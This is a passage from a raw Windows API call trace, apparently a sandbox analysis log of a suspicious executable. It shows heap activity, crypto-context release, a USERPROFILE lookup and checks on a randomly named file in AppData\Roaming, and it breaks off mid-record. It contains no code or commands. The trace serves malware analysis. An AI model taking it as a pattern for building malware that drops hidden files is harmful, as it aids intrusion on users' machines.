[0234.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.304] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.304] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.304] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04118 | out: hHeap=0x970000) returned 1 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.304] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0234.304] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0234.304] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0234.304] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0234.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.305] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0234.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0234.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0234.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0234.305] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0234.305] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.305] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0234.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.305] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0234.310] FreeLibrary (hLibModule=0x756e0000) returned 1 [0234.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0234.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0234.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0234.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0234.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.310] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0234.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0234.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0234.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0234.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0234.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0234.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0234.311] CloseHandle (hObject=0x2d0) returned 1 [0234.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0234.318] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0234.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0234.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0234.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0234.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0234.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0234.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0234.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0234.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0234.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0234.319] CloseHandle (hObject=0x2a0) returned 1 [0234.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0234.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0234.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0234.327] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0234.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0234.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0234.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0234.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0234.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0234.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0234.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0234.378] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0234.379] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0234.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e564e0 [0234.379] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/ljcsRI_.swf", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\ljcsRI_.swf", lpFilePart=0x8cedf4*="ljcsRI_.swf") returned 0x2b [0234.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0234.379] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ljcsRI_.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ljcsri_.swf")) returned 0x20 [0234.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\ljcsRI_.swf", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, 